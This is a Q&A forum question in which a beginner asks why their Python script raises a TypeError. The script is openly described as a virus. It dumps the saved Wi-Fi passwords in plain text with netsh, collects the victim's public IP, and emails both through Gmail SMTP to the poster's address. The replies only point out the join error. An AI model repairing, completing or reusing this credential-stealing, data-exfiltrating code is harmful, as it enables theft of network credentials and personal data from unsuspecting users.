# TypeError: sequence item 4: expected str instance, _io.TextIOWrapper found in PYTHON 3.8.1

Tags: python-3.x

IM SPANISH SO SOME PARTS OF THE CODE (specially names and other things)

python gives me this error

i wanna help cuz im new in python and fixing errors its not my special hability (sorry for my english im spanish)

```
Traceback (most recent call last):
  File "C:\Users\Ticua\Desktop\#test with ip.py", line 38, in <module>
    BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: victima del virus', ip, f])
TypeError: sequence item 4: expected str instance, _io.TextIOWrapper found
```

%%MYPASSWORD%% is the password of the mail that i dont wanna be discovered

my code :

```
import subprocess

requests = 'requests'

subprocess.call(['pip', 'install', requests])

from requests import get

import smtplib

ip = str(get('https://api.ipify.org').text)

y = 'C:'

reques = input("pon el nombre de tu red : ")

x = str(subprocess.call(['netsh', 'wlan', 'export', 'profile', 'key=clear', 'folder=C:']))

f = open('C:' + '/Conexión de red inalámbrica-' + reques + '.xml', 'r')


TO = 'ticua07@gmail.com'
SUBJECT = 'victima del virus'

TEXT = ip, f

    # Gmail Sign In
gmail_sender = 'logonuihacks@gmail.com'
gmail_passwd = '%%MYPASSWORD%%'

server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(gmail_sender, gmail_passwd)

BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: victima del virus', ip, f])
f.close()
try:
 server.sendmail(gmail_sender, [TO], BODY)
 print ('email sent')
except:
    print("fu***d up")
```

Comment: well, `join` is a string method that takes an iterable of strings and you pass it a file descriptor

Comment: What behavior do you expect when you pass to `str.join` a sequence that contains `f`, a file object?

Comment: and... what i type wrong to gives me that error?